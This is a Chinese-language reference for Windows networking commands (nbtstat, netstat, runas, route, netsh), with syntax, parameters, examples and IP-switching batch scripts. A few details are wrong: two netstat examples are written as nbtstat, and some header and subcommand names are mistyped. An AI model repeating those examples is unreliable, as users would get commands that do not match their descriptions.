显示 NetBIOS 客户和服务器会话,并试图将目标 IP 地址转化为名称。
-S
显示 NetBIOS 客户和服务器会话,只通过 IP 地址列出远程计算机。
Interval
重新显示选择的统计资料,可以中断每个显示之间的 Interval 中指定的秒数。按 CTRL+C 停止重新显示统计信息。如果省略该参数, netstat 将只显示一次当前的配置信息。
/?
在命令提示符显示帮助。
注释
Nbtstat 命令行参数区分大小写。
下表列出了由 Nbtstat 生成的列标题。 标题 说明
Input 接收的字节数。
Output 发送的字节数。
In/Out 该连接是否从计算机(传出)或者其他计算机到本地计算机(传入)。
Lift 名称表缓存项在被清除之前所存留的时间。
Local Name 本地 NetBIOS 名称与连接相关联。
Remote Host 与远程计算机相关的名称或 IP 地址。
<03> 转化为十六进制的 NetBIOS 名称的最后一个字节。每个 NetBIOS 名称长度均为 16 个字符。由于最后一个字节通常有特殊的意义,因为相同的名称(只有最后一个字节不同)可能在一台计算机上出现几次。例如,<20> 在 ASCII 文本中是一个空格。
Type 名称类型。名称可以是单个名称,也可以是组名称。
Status 远程计算机上是否在运行 NetBIOS 服务("已注册"),或同一计算机名是否已注册了相同的服务("冲突")。
State NetBIOS 连接的状态。
下表列出了可能的 NetBIOS 连接状态。 状态 说明
已连接 会话已建立。
关联 连接的终结点已经被创建并与 IP 地址关联。
正接听 该终结点对内向连接可用。
空闲 该结束点已被打开单不能接收连接。
正在连接 会话处于连接阶段。在此阶段正在解析所选目标的由名称到 IP 地址的映射。
接受 入站会话当前正在被接受,将在短期内连接。
重新连接 会话将试图重新连接(如果第一次连接失败)。
出站 会话正处于连接阶段。此阶段正在创建 TCP 连接。
入站 入站会话在连接期。
正在断开 会话正在断开连接。
已中断连接 本地计算机已断开连接,并正等待远程系统的确认。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要显示 NetBIOS 计算机名为 CORP07 的远程计算机的 NetBIOS 名称表,请键入:
nbtstat -a CORP07
要显示所分配 IP 地址为 10.0.0.99 的远程计算机的 NetBIOS 名称表,请键入:
nbtstat -A 10.0.0.99
要显示本地计算机的 NetBIOS 名称表,请键入:
nbtstat -n
要显示本地计算机 NetBIOS 名称缓存的内容,请键入:
nbtstat -c
要清除 NetBIOS 名称缓存并重新装载本地 Lmhosts 文件中带标记 #PRE 的项目,请键入:
nbtstat -R
要释放通过 WINS 服务器注册的 NetBIOS 名称并对其重新注册,请键入:
nbtstat -RR
要每隔 5 秒以 IP 地址显示 NetBIOS 会话统计资料,请键入:
nbtstat -S 5
17.Netstat
显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息(对于 IP、ICMP、TCP 和 UDP 协议)以及 IPv6 统计信息(对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议)。使用时如果不带参数,netstat 显示活动的 TCP 连接。
语法
netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]
参数
-a
显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。
-e
显示以太网统计信息,如发送和接收的字节数、数据包数。该参数可以与 -s 结合使用。
-n
显示活动的 TCP 连接,不过,只以数字形式表现地址和端口号,却不尝试确定名称。
-o
显示活动的 TCP 连接并包括每个连接的进程 ID (PID)。可以在 Windows 任务管理器中的"进程"选项卡上找到基于 PID 的应用程序。该参数可以与 -a、-n 和 -p 结合使用。
-p Protocol
显示 Protocol 所指定的协议的连接。在这种情况下,Protocol 可以是 tcp、udp、tcpv6 或 udpv6。如果该参数与 -s 一起使用按协议显示统计信息,则 Protocol 可以是 tcp、udp、icmp、ip、tcpv6、udpv6、icmpv6 或 ipv6。
-s
按协议显示统计信息。默认情况下,显示 TCP、UDP、ICMP 和 IP 协议的统计信息。如果安装了 Windows XP 的 IPv6 协议,就会显示有关 IPv6 上的 TCP、IPv6 上的 UDP、ICMPv6 和 IPv6 协议的统计信息。可以使用 -p 参数指定协议集。
-r
显示 IP 路由表的内容。该参数与 route print 命令等价。
Interval
每隔 Interval 秒重新显示一次选定的信息。按 CTRL+C 停止重新显示统计信息。如果省略该参数,netstat 将只打印一次选定的信息。
/?
在命令提示符显示帮助。
注释
与该命令一起使用的参数必须以连字符 (-) 而不是以短斜线 (/) 作为前缀。
Netstat 提供下列统计信息:
Proto
协议的名称(TCP 或 UDP)。
Local Address
本地计算机的 IP 地址和正在使用的端口号。如果不指定 -n 参数,就显示与 IP 地址和端口的名称对应的本地计算机名称。如果端口尚未建立,端口以星号(*)显示。
Foreign Address
连接该插槽的远程计算机的 IP 地址和端口号码。如果不指定 -n 参数,就显示与 IP 地址和端口对应的名称。如果端口尚未建立,端口以星号(*)显示。
(state)
表明 TCP 连接的状态。可能的状态如下:
CLOSE_WAIT
CLOSED
ESTABLISHED
FIN_WAIT_1
FIN_WAIT_2
LAST_ACK
LISTEN
SYN_RECEIVED
SYN_SEND
TIMED_WAIT
有关 TCP 连接状态的信息,请参阅 RFC 793。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要想显示以太网统计信息和所有协议的统计信息,请键入下列命令:
netstat -e -s
要想仅显示 TCP 和 UDP 协议的统计信息,请键入下列命令:
netstat -s -p tcp udp
要想每 5 秒钟显示一次活动的 TCP 连接和进程 ID,请键入下列命令:
nbtstat -o 5
要想以数字形式显示活动的 TCP 连接和进程 ID,请键入下列命令:
nbtstat -n -o
18.Runas
允许用户用其他权限运行指定的工具和程序,而不是用户当前登录提供的权限。
语法
runas [{/profile|/noprofile}] [/env] [/netonly] [/smartcard] [/showtrustlevels] [/trustlevel] /user:UserAccountName program
参数
/profile
加载用户的配置文件。/profile 是默认值。
/no profile
/noprofile 指定不加载用户的配置文件。这使应用程序载入的更加快速,但是在一些应用程序中也会引起错误。
/env
指定当前使用的网络环境,而不是用户的本地环境。
/netonly
指明指定的用户信息只用于远程访问。
/smartcard
/smartcard 表示凭据是否是由智能卡提供的。
/showtrustlevels
列出 /trustlevel 开关项。
/trustlevel
指定应用程序运行所在的授权级别。使用 /showtrustlevels 查看可用的信任级别。
/user:UserAccountName
指定在其下运行程序的用户帐户的名称。用户帐户的格式应是 user@domain 或 domain\user。
程序
指定要用在 /user 中指定的帐户运行的程序或命令。
/?
在命令提示符显示帮助。
注释
管理员可以使用一个权限受限制的帐户执行日常、非管理性的任务,只有在执行特定管理任务时,才使用一个权限更大的帐户。要不经过注销再重新登录就完成这样的任务,可以用一般帐户登录,然后使用 runas 命令来运行需要更大权限的工具。
有关 runas 命令的使用范例,请参阅"相关主题"。
尽管 runas 通常由 Administrator 帐户使用,但并非仅限于 Administrator 帐户。任何拥有多个帐户的用户均可以利用备用凭据,使用 runas 运行程序、MMC 控制台或"控制面板"项。
如果要在计算机上使用 Administrator 帐户,对于 /user:,键入下列参数之一:
/user:AdministratorAccountName@ComputerName
/user:ComputerName\AdministratorAccountName
如果想以域管理员身份使用这个命令,键入下列参数之一:
/user:AdministratorAccountName@DomainName
/user:DomainName\AdministratorAccountName
runas 命令允许您运行程序 (*.exe)、保存的 MMC 控制台 (*.msc)、程序和保存的 MMC 控制台的快捷方式及"控制面板"项。作为另一组(例如"Users"或"Power Users"组)的成员登录到计算机时,可以以管理员的身份运行。
可以使用 runas 命令来启动任何程序、MMC 控制器或"控制面板"项。只要提供适当的用户帐户和密码信息,用户帐户就具有登录到计算机的能力,并且程序、MMC 控制台、"控制面板"项在系统中及对该用户帐户均可用.
runas 命令允许您管理其他域的服务器(运行工具的计算机和要管理的服务器在不同的域中)。
如果尝试使用 runas 从网络位置启动程序、MMC 控制台或"控制面板"项,可能会因为用来连接网络共享的凭据与用来启动程序的凭据不同而失败。后者的凭据可能无法访问同一网络共享。
有些项,例如"打印机"文件夹和桌面项,间接由 Windows 2000 打开,而不能使用 runas 命令启动。
如果 runas 命令失败,则可能是没有运行 RunAs 服务或使用的用户帐户无效。要检查 RunAs 服务的状态,请在"计算机管理"中单击"服务和应用程序",然后单击"服务"。要测试用户帐户,请尝试使用该帐户登录合适的域。
范例
要在本地计算机上以管理员身份启动 Windows 2000 命令提示行实例,请键入:
runas /user:localmachinename\administrator cmd
系统提示时,键入管理员密码。
要使用名为 companydomain\domainadmin 的域管理员帐户启动"计算机管理"管理单元实例,请键入: runas /user:companydomain\domainadmin "mmc %windir%\system32\compmgmt.msc"
当提示时,键入帐户密码。
要使用名为 domain.microsoft.com 的域中的域管理员帐户 user 启动"记事本"实例,请键入:
runas /user:user@domain.microsoft.com "notepad my_file.txt"
当提示时,键入帐户密码。
要启动命令提示符行窗口、保存的 MMC 控制台、控制面板项或管理其他地点服务器的程序的一个实例,请键入:
runas /netonly /user:domain\username "command"
domain\username 必须是有足够权限管理服务器的用户。当提示时,键入帐户密码。
19.Route
在本地 IP 路由表中显示和修改条目。使用不带参数的 route 可以显示帮助。
语法
route [-f] [-p] [Command [Destination] [mask Netmask] [Gateway] [metric Metric]] [if Interface]]
参数
-f
清除所有不是主路由(网掩码为 255.255.255.255 的路由)、环回网络路由(目标为 127.0.0.0,网掩码为 255.255.255.0 的路由)或多播路由(目标为 224.0.0.0,网掩码为 240.0.0.0 的路由)的条目的路由表。如果它与命令之一(例如 add、change 或 delete)结合使用,表会在运行命令之前清除。
-p
与 add 命令共同使用时,指定路由被添加到注册表并在启动 TCP/IP 协议的时候初始化 IP 路由表。默认情况下,启动 TCP/IP 协议时不会保存添加的路由。与 print 命令一起使用时,则显示永久路由列表。所有其它的命令都忽略此参数。永久路由存储在注册表中的位置是 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\PersistentRoutes。
Command
指定要运行的命令。下表列出了有效的命令。 命令 目的
add 添加路由
change 更改现存路由
delete 删除路由
print 打印路由
Destination
指定路由的网络目标地址。目标地址可以是一个 IP 网络地址(其中网络地址的主机地址位设置为 0),对于主机路由是 IP 地址,对于默认路由是 0.0.0.0。
mask subnetmask
指定与网络目标地址相关联的网掩码(又称之为子网掩码)。子网掩码对于 IP 网络地址可以是一适当的子网掩码,对于主机路由是 255.255.255.255 ,对于默认路由是 0.0.0.0。如果忽略,则使用子网掩码 255.255.255.255。定义路由时由于目标地址和子网掩码之间的关系,目标地址不能比它对应的子网掩码更为详细。换句话说,如果子网掩码的一位是 0,则目标地址中的对应位就不能设置为 1。
Gateway
指定超过由网络目标和子网掩码定义的可达到的地址集的前一个或下一个跃点 IP 地址。对于本地连接的子网路由,网关地址是分配给连接子网接口的 IP 地址。对于要经过一个或多个路由器才可用到的远程路由,网关地址是一个分配给相邻路由器的、可直接达到的 IP 地址。
metric Metric
为路由指定所需跃点数的整数值(范围是 1 ~ 9999),它用来在路由表里的多个路由中选择与转发包中的目标地址最为匹配的路由。所选的路由具有最少的跃点数。跃点数能够反映跃点的数量、路径的速度、路径可靠性、路径吞吐量以及管理属性。
if Interface
指定目标可以到达的接口的接口索引。使用 route print 命令可以显示接口及其对应接口索引的列表。对于接口索引可以使用十进制或十六进制的值。对于十六进制值,要在十六进制数的前面加上 0x。忽略 if 参数时,接口由网关地址确定。
/?
在命令提示符显示帮助。
注释
路由表中 跃点数 一列的值较大是由于允许 TCP/IP 根据每个 LAN 接口的 IP 地址、子网掩码和默认网关的配置自动确定路由表中路由的跃点数造成的。默认启动的自动确定接口跃点数确定了每个接口的速度,调整了每个接口的路由跃点数,因此最快接口所创建的路由具有最低的跃点数。要删除大跃点数,请在每个 LAN 连接的 TCP/IP 协议的高级属性中禁用自动确定接口跃点数。
如果在 systemroot\System32\Drivers\Etc 文件夹的本地网络文件中存在适当的条目,名称可以用于 Destination。只要名称可以通过"域名系统" (DNS) 查询这样的标准主机名解析技术分解为 IP 地址,就可以将其用于 Gateway,DNS 查询使用存储在 systemroot\System32\Drivers\Etc 文件夹下的本地主机文件和 NetBIOS 名称解析。
如果是 print 或 delete 命令,可以忽略 Gateway 参数,使用通配符来表示目标和网关。Destination 的值可以是由星号 (*) 指定的通配符。如果指定目标含有一个星号 (*) 或问号 (?),它被看作是通配符,只打印或删除匹配的目标路由。星号代表任意一字符序列,问号代表任一字符。例如, 10.*.1, 192.168.*、 127.* 和 *224* 都是星号通配符的有效使用。
使用了无效的目标和子网掩码(网掩码)值的组合,会显示"Route:bad gateway address netmask"错误消息。目标中有一位或多位设置为 1,而其在子网掩码中的对应位设置为 0 时会发生这个错误。可以通过二进制表示法表示目标和子网掩码来检查这种情况。以二进制表示的子网掩码包括表示目标网络地址部分的一连串的 1 和表示目标主机地址部分的一连串的 0 两个部分。查看目标以确定目标的主机地址部分(由子网掩码所定义)是否有些位设置成了 1。
只有 Windows NT 4.0、Windows 2000、Windows Millennium Edition 和 Windows XP 的 route 命令支持 -p 参数。Windows 95 或 Windows 98 的 route 命令不支持该参数。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要显示 IP 路由表的完整内容,请键入:
route print
要显示 IP 路由表中以 10. 开始的路由,请键入:
route print 10.*
要添加默认网关地址为 192.168.12.1 的默认路由,请键入:
route add 0.0.0.0 mask 0.0.0.0 192.168.12.1
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1 的路由,请键入:
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1 的永久路由,请键入:
route -p add 10.41.0.0 mask 255.255.0.0 10.27.0.1
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1,跃点数为 7 的路由,请键入:
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 metric 7
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1,接口索引为 0x3 的路由,请键入:
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 if 0x3
要删除目标为 10.41.0.0,子网掩码为 255.255.0.0 的路由,请键入:
route delete 10.41.0.0 mask 255.255.0.0
要删除 IP 路由表中以 10. 开始的所有路由,请键入:
route delete 10.*
要将目标为 10.41.0.0,子网掩码为 255.255.0.0 的路由的下一个跃点地址由 10.27.0.1 更改为 10.27.0.25,请键入:
route change 10.41.0.0 mask 255.255.0.0 10.27.0.25
怎样在windowsserver的cmd下更改ip地址■■■ -> Windows 2k/2003 Server
在命令行下更改ip地址
Windows2000是现在比较流行的操作系统,它的功能是很强大的,它甚至可以象Unix一样在命令行下做很多的工作。下面一种在命令行下更改ip地址的方法,现介绍给大家(括号里是一些注释,黑体字是人工录入的):
C:\>ipconfig (首先用ipconfig这个命令看一下更改之前的ip地址)
Windows 2000 IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.1.1.94 (本地连接更改之前的ip)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.1.1.254
C:\>netsh (进入设置模式)
netsh>interface
interface>ip
interface ip>set address "本地连接" static 10.1.1.111 255.255.255.0 10.1.1.254
interface ip>exit
上文中的set命令具体解释如下:
set address - 设置指定的接口的 IP 地址和默认网关。
set dns - 设置 DNS 服务器模式和地址。
set wins - 设置 WINS 服务器模式和地址。
网络常用命令:
IPCONFIG
C:\>ipconfig (更改后再用ipconfig命令看一下,确认一下是否更改成功)
Windows 2000 IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix .
IP Address. . . . . . . . . . . . : 10.1.1.111
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.1.1.254
命令一览
.. - 移到上一层上下文级。
? - 显示命令列表。
aaaa - 更改到 `aaaa' 上下文。
abort - 丢弃在脱机模式下所做的更改。
add - 将一个配置项添加到项目列表中。
alias - 添加一个别名
bye - 退出程序。
commit - 提交在脱机模式中所做的更改。
delete - 在项目列表上删除一个配置项目。
dhcp - 更改到 `dhcp' 上下文。
dump - 显示一个配置脚本。
exec - 运行一个脚本文件。
exit - 退出程序。
help - 显示命令列表。
interface - 更改到 `interface' 上下文。
offline - 将当前模式设置成脱机。
online - 将当前模式设置成联机。
popd - 从堆栈上打开一个上下文。
pushd - 将当前上下文放推入堆栈。
quit - 退出程序。
ras - 更改到 `ras' 上下文。
routing - 更改到 `routing' 上下文。
set - 更新配置设置。
show - 显示信息
unalias - 删除一个别名。
wins - 更改到 `wins' 上下文。
快速切换IP地址有绝招
在工作过程中会遇到在不同的网段中进行网络调试的情况,经常需要将机器在几个不同的IP地址中进行切换。在Win2000操作系统中改变IP地址较之Win98已经方便多了因为改完IP地址后不需要重启计算机,但还要进入网络属性设置中进行操作。有没有再简便一点的方法呢,比如用鼠标双击一下快捷方式就可以实现IP地址的切换?
答案是肯定的。在Win2000中用netsh命令就可以实现这个功能。首先进入命令行模式(在"开始→运行"中键入"cmd"即可进入命令行模式),在提示符下键入netsh即可进入netsh的界面。再键入int ip进入接口IP的配置模式,键入dump则列出接口IP配置信息:
C:\Documents and Settings\Administrator>netsh
netsh>
netsh>int ip
interface ip>dump
# ----------------------------------
# 接口 IP 配置
# ----------------------------------
pushd interface ip
# ″本地连接″ 的接口IP 配置(注:以下显示视具体机器情况而定)
set address name = ″本地连接″ source = static addr = 192.168.0.5 mask = 255.255.255.0
set address name = ″本地连接″ gateway = 192.168.0.2 gwmetric = 1
set dns name = ″本地连接″ source = static addr = 61.237.17.181
add dns name = ″本地连接″ addr = 211.97.168.129
add dns name = ″本地连接″ addr = 211.98.4.1
set wins name = ″本地连接″ source = static addr = none
# ″本地连接 2″ 的接口 IP 配置
set address name = ″本地连接 2″ source = dhcp
set dns name = ″本地连接 2″ source = dhcp
set wins name = ″本地连接 2″ source = dhcp
popd
# 接口 IP 配置结束
快速切换IP地址有绝招 2
现在我们可以大致了解到用netsh命令更改IP地址的方式,即通过"set address name =连接名称(连接名称要用引号括起来)source=static addr=IP地址 mask=子网掩码"来实现。
到命令行模式下用netsh直接试一下。比如要将本机的IP地址改为192.168.0.7,子网掩码为255.255.255.0,可以进行以下操作:
C:\Documents and Settings\Administrator>netsh
netsh>int ip
interface ip>set address name ="本地连接"source = static addr = 192.168.0.7 mask = 255.255.255.0
确认更改。
interface ip>exit
再用ipconfig命令核实一下:
C:\Documents and Settings\Administrator>ipconfig
Windows 2000 IP Configuration
Ethernet adapter 本地连接 2
Media State . . . . . . . . . . . Cable Disconnected
Ethernet adapter 本地连接
Connection-specific DNS Suffix .
IP Address. . . . . . . . . . . . 192.168.0.7
Subnet Mask . . . . . . . . . . . 255.255.255.0
Default Gateway . . . . . . . . . 192.168.0.2
从以上显示中可以看到已经成功实现了在Win2000中用命令行方式来改变IP地址。用这种方式改变IP地址甚至还没有在图形界面中操作来得快。不过我们再用脚本帮一下忙,离胜利目标就不远了。首先打开记事本,输入以下内容: int ip
set address name=″本地连接″ source=static addr=192.168.0.7 mask=255.255.255.0
然后保存为一个名为"7.sh"的文件,放到C盘根目录下,再进入命令行模式,在C盘根目录下键入"netsh exec 7.sh",好像没什么反应啊?不过再用ipconfig查看一下,会发现IP地址已经改过来了。
最后再用记事本写一个批处理文件,命名为"7.bat",内容为"netsh exec 7.sh"。为该文件在桌面上创建一个快捷方式,这样双击该快捷方式即可实现IP地址的快速改变。如果要快速在192.168.0.5、192.168.0.7等相同网段IP地址间进行切换的话,只需要改变"addr"后面的地址即可,但是要将IP地址改为如172.19.96.7之类不同网段的IP地址,就需要将网关信息一起改变,也就是在脚本文件中加入一行关于网关的信息:
int ip
set address name = ″本地连接″source = static addr= 172.19.96.7 mask = 255.255.255.0
set address name = ″本地连接″gateway = 172.19.96.1 gwmetric = 1
同样地将以上内容存为脚本文件,再做成批处理文件执行一下,用ipconfig/all命令检测一下,发现包括网关在内的信息也修改过来了。这是不是既快又方便,IP地址想换就换?
使用 netstat 显示连接统计
可以使用 netstat 命令显示协议统计信息和当前的 TCP/IP 连接。netstat -a 命令将显示所有连接,而 netstat -r 显示路由表和活动连接。netstat -e 命令将显示 Ethernet 统计信息,而 netstat -s 显示每个协议的统计信息。如果使用 netstat -n,则不能将地址和端口号转换成名称。
Tracert(跟踪路由)是路由跟踪实用程序,用于确定 IP 数据报访问目标所采取的路径。Tracert 命令用 IP 生存时间 (TTL) 字段和 ICMP 错误消息来确定从一个主机到网络上其他主机的路由。
-d 指定不将IP 地址解析到主机名称。
-h maximum_hops 指定跃点数以跟踪到称为 target_name 的主机的路由。
-j host-list 指定 Tracert 实用程序数据包所采用路径中的路由器接口列表。
-w timeout 等待 timeout 为每次回复所指定的毫秒数。
target_name 目标主机的名称或 IP 地址。
pathping 命令是一个路由跟踪工具,它将 ping 和 tracert 命令的功能和这两个工具所不提供的其他信息结合起来。pathping 命令在一段时间内将数据包发送到到达最终目标的路径上的每个路由器,然后基于数据包的计算机结果从每个跃点返回。由于命令显示数据包在任何给定路由器或链接上丢失的程度,因此可以很容易地确定可能导致网络问题的路由器或链接。
-n Hostnames 不将地址解析成主机名。
-h Maximum hops 搜索目标的最大跃点数。
-g Host-list 沿着路由列表释放源路由。
-p Period 在 ping 之间等待的毫秒数。
-q Num_queries 每个跃点的查询数。
-w Time-out 为每次回复所等待的毫秒数。
-T Layer 2 tag 将第 2 层优先级标记(例如,对于 IEEE 802.1p)连接到数据包并将它发送到路径中的每个网络设备。这有助于标识没有正确配置第 2 层优先级的网络设备。-T 开关用于测试服务质量 (QoS) 连通性。
-R RSVP test Che 检查以确定路径中的每个路由器是否支持"资源保留协议 (RSVP)",此协议允许主机为数据流保留一定量的带宽。 -R 开关用于测试服务质量 (QoS) 连通性。
在命令提示符下交互使用 DHCP 命令
打开 命令提示符。
键入 netsh。
在 netsh>(Netshell) 命令提示行键入"dhcp"。
在 dhcp>(DHCP 辅助程序)命令提示行,为您要管理的服务器键入 server \\servername 或 server ip_address。
一旦您有权管理的服务器已成功连接,则会看到"您可以对服务器 servername 进行读写访问"
一旦连接成功,您就可以使用用于 DHCP 的任何支持的 Netshell 命令。 键入 /? 或 help 来显示直接的 DHCP 子命令菜单或作为选项显示,键入 list 列出可与 DHCP 一起使用的所有 Netshell 子命令。
route 的命令
routing ip add/delete/set/show interface 在指定接口上添加、删除、配置或显示常规 IP 路由设置。
routing ip add/delete/set/show filter 在指定接口上添加、删除、配置或显示 IP 数据包筛选器。
routing ip add/delete/show boundary 在指定接口上添加、删除或显示多播边界设置。
routing ip add/set ipiptunnel 添加或配置 IP 中的 IP 接口。
routing ip add/delete/set/show rtmroute 添加、配置或显示不持续的路由表管理器路由。
routing ip add/delete/set/show persistentroute 添加、删除、配置或显示持续路由。
routing ip add/delete/set/show preferenceforprotocol 添加、删除、配置或显示路由协议的优先级。
routing ip add/delete/set/show scope 添加、删除或显示多播作用域。
routing ip set/show loglevel 配置或显示全局 IP 记录等级。
routing ip show helper 显示 IP 的所有 Netsh 实用程序子环境。
routing ip show protocol 显示所有正在运行的 IP 路由协议。
routing ip show mfe 显示多播转发项。
routing ip show mfestats 显示多播转发项统计。
routing ip show boundarystats 显示 IP 多播边界。
routing ip show r***estinations 显示路由表管理器路由表中的目标。
routing ip show rtmroutes 显示路由表管理器路由表中的路由。
routing ip nat set/show global 配置或显示全局网络地址转换 (NAT) 设置。
routing ip nat add/delete/set/show interface 添加、删除、配置或显示指定接口的 NAT 设置。
routing ip nat add/delete addressrange 在 NAT 接口公用地址池中添加或删除一个地址范围。
routing ip nat add/delete addressmapping 添加或删除 NAT 地址映射。
routing ip nat add/delete portmapping 添加或删除 NAT 端口映射。
routing ip autodhcp set/show global 配置或显示全局 DHCP 分配器参数。
routing ip autodhcp set/show interface 配置或显示指定接口的 DHCP 分配器设置。
routing ip autodhcp add/delete exclusion 在 DHCP 分配器地址范围中添加或删除一个排除范围。
routing ip dnsproxy set/show global 配置或显示全局 DNS 代理参数。
routing ip dnsproxy set/show interface 配置或显示指定接口的 DNS 代理参数。
routing ip igmp set/show global 配置或显示 IGMP 全局设置。
routing ip igmp add/delete/set/show interface 在指定接口上添加、删除、配置或显示 IGMP。
routing ip igmp add/delete staticgroup 添加或删除指定接口的静态多播组。
routing ip igmp show grouptable 显示 IGMP 主机组表。
routing ip igmp show ifstats 显示每个接口的 IGMP 统计。
routing ip igmp show iftable 显示每个接口的 IGMP 主机组。
routing ip igmp show proxygrouptable 显示 IGMP 代理接口的 IGMP 组表。
routing ip igmp show rasgrouptable 显示远程访问服务器所使用的 Internet 接口的组表。
routing ip ospf set/show global 配置或显示全局 OSPF 设置。
routing ip ospf add/delete/set/show interface 在指定接口上添加、删除、配置或显示 OSPF。
routing ip ospf add/delete/set/show area 添加、删除、配置或显示 OSPF 区域。
routing ip ospf add/delete/show range 在指定的 OSPF 区域上添加、删除、配置或显示范围。
routing ip ospf add/delete/set/show virtif 添加、删除、配置或显示 OSPF 虚拟接口。
routing ip ospf add/delete/show neighbor 添加、删除、配置或显示 OSPF 邻居。
routing ip ospf add/delete/show protofilter 添加、删除、配置或显示 OSPF 外部路由的路由信息源。
routing ip ospf add/delete/show routefilter 添加、删除、配置或显示 OSPF 外部路由的路由筛选。
routing ip ospf show areastats 显示 OSPF 区域统计。
routing ip ospf show lsdb 显示 OSPF 链接状态数据库。
routing ip ospf show virtifstats 显示 OSPF 虚拟链接统计。
routing ip relay set global 配置"DHCP 中继代理程序"的全局设置。
routing ip relay add/delete/set interface 在指定接口上添加、删除或配置"DHCP 中继代理程序"设置。
routing ip relay add/delete dhcpserver 在 DHCP 服务器地址列表中添加或删除 DHCP 服务器的 IP 地址。
routing ip relay show ifbinding 显示接口的 IP 地址绑定。
routing ip relay show ifconfig 显示每个接口的"DHCP 中继代理程序"配置。
routing ip relay show ifstats 显示每个接口的 DHCP 统计。
routing ip rip set/show global 配置 IP 的 RIP 全局设置。
routing ip rip add/delete/set/show interface 在指定接口上添加或配置 IP 的 RIP 设置。
routing ip rip add/delete peerfilter 添加或删除 RIP 对等筛选器。
routing ip rip add/delete acceptfilter 在接受的路由列表中添加或删除 RIP 路由筛选器。
routing ip rip add/delete announcefilter 在公布的路由列表中添加或删除 RIP 路由筛选器。
routing ip rip add/delete/show neighbor 添加或删除 RIP 邻居。
routing ip rip set/show flags 在指定接口上配置 IP RIP 高级设置。
routing ip rip show globalstats 显示全局 RIP 参数。
routing ip rip show ifbinding 显示接口的 IP 地址绑定。
routing ip rip show ifstats 显示每个接口的 RIP 统计。
IPX netsh 路由命令
routing ipx add/set staticroute 在 IPX 路由表中添加或配置静态 IPX 路由。
routing ipx add/set staticservice 在 SAP 服务表中添加或配置静态 SAP 服务。
routing ipx add/set filter 在指定的接口上添加或配置 IPX 数据包筛选器。
routing ipx add/set interface 在请求拨号接口上启用 IPX 路由,或在指定的接口上配置 IPX 设置。
routing ipx set global 配置全局 IPX 路由设置。
routing ipx rip add/set filter 添加和配置 RIP 路由筛选器。
routing ipx rip set global 配置全局 IPX 的 RIP 设置。
routing ipx rip set interface 在指定接口上配置 IPX 的 RIP 设置。
routing ipx sap add/set filter 添加或配置 SAP 服务筛选器。
routing ipx sap set global 配置全局 IPX 的 SAP 设置。
routing ipx sap set interface 在指定接口上配置 IPX 的 SAP 设置。
routing ipx netbios add nbname 将静态 NETBIOS 名称添加到 IPX NetBIOS 名称表中。
routing ipx netbios set interface 在指定接口上配置基于 IPX 的 NetBIOS 设置。
WINS NetSh 命令
list 列出所有可用的 WINS 命令。
dump 将 WINS 服务器配置转储到命令输出。
add name 在服务器上注册名称。详细信息,请输入 add name /?
add partner 向服务器添加复制伙伴。详细信息,请输入 add partner /?
add pngserver 添加当前服务器的 Persona Non Grata 服务器列表。详细信息,请输入 add pngserver /?
check database 检查数据库的一致性。详细信息,请输入 check database /?
check name 检查一组 WINS 服务器的名称记录列表。详细信息,请输入 check name /?
check version 检查版本号的一致性。详细信息,请输入 check version /?
delete name 从服务器数据库中删除已注册的名称。详细信息,请输入 delete name /?
delete partner 从复制伙伴列表中删除复制伙伴。详细信息,请输入 delete partner /?
delete records 从服务器删除或逻辑删除所有记录或一组记录。详细信息,请输入 delete records /?
delete owners 删除所有者列表及其记录。详细信息,请输入 delete owners /?
delete pngserver 从列表中删除所有的或选定的 Persona Non Grata 服务器。详细信息,请输入 delete pngserver /?
init backup 备份 WINS 数据库。详细信息,请输入 init backup /?
init import 从 Lmhosts 文件导入数据。详细信息,请输入 init import /?
init pull 启动"拉"触发器,并发送给另一台 WINS 服务器。详细信息,请输入 init pull /?
init pullrange 开始另一台 WINS 服务器的一组记录,并读取该记录。详细信息,请输入 init pullrange /?
init push 启动"推"触发器,并发送给另一台 WINS 服务器。详细信息,请输入 init push /?
init replicate 用复制伙伴复制数据库。详细信息,请输入 init replicate /?
init restore 从文件还原数据库。详细信息,请输入 init restore /?
init scavenge 清除服务器的 WINS 数据库。详细信息,请输入 init scavenge /?
init search 搜索服务器的 WINS 数据库。详细信息,请输入 init search /?
reset statistics 重置服务器的统计信息。详细信息,请输入 reset statistics /?
set autopartnerconfig 设置服务器的自动复制伙伴配置信息。详细信息,请输入 set autopartnerconfig /?
set backuppath 设置服务器的备份参数。详细信息,请输入 set backuppath /?
set burstparam 设置服务器的突发处理参数。详细信息,请输入 set autopartnerconfig /?
set logparam 设置数据库和事件日志记录选项。详细信息,请输入 set logparam /?
set migrateflag 设置服务器的迁移标志。详细信息,请输入 set migrateflag /?
set namerecord 设置服务器的间隔和超时值。详细信息,请输入 set namerecord /?
set periodicdbchecking 设置服务器的定期数据库检查参数。详细信息,请输入 set periodicdbchecking /?
set pullpartnerconfig 设置指定的"拉"伙伴的配置参数。详细信息,请输入 set pullpartnerconfig /?
set pushpartnerconfig 设置指定的"推"伙伴的配置参数。详细信息,请输入 set pushpartnerconfig /?
